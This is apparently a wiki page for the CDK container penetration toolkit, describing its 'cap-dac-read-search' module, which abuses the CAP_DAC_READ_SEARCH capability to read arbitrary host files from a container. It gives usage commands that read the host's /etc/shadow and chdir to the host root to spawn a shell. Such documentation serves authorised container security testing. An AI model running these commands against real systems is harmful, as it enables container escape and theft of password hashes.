Skip to content

Exploit: cap dac read search

Jump to bottom
neargle edited this page Sep 5, 2021 · 4 revisions

Exploit: cap-dac-read-search

Thanks @nikitastupin & @verctor.

If container is run with CAP_DAC_READ_SEARCH capability it is able to read arbitrary file from host system. This is possible because CAP_DAC_READ_SEARCH gives ability to bypass DAC (discretionary access control) checks and open files by file handles which are global file identifiers. Original exploit can be found at http://stealth.openwall.net/xSports/shocker.c.

Usage

# read file from host
./cdk run cap-dac-read-search <target>

# specify bind mount point file path and read file
./cdk run cap-dac-read-search /etc/hosts /tmp/pwn

# when target file is /, this exploit will chdir to host root and execute a command(default: /bin/bash)
./cdk run cap-dac-read-search /etc/hosts /

# also you can specify what command to be executed, but cdk will recognize the string starting with'-' as its own option, so only some simple commands can be used
./cdk run cap-dac-read-search /etc/hosts / cat /tmp/pwn

Example

  1. Build cdk
  2. Run a docker container docker run -it --rm --cap-add CAP_DAC_READ_SEARCH -v "$(pwd)/cdk":/cdk ubuntu /bin/bash 1. Run cdk exploit inside the container cdk run cap-dac-read-search /etc/shadow /etc/hosts

You should get /etc/shadow from host:

host-shadow

Verify that /etc/shadow from container is different:

container-shadow

ref: https://github.com/cdk-team/CDK/pull/27

Clone this wiki locally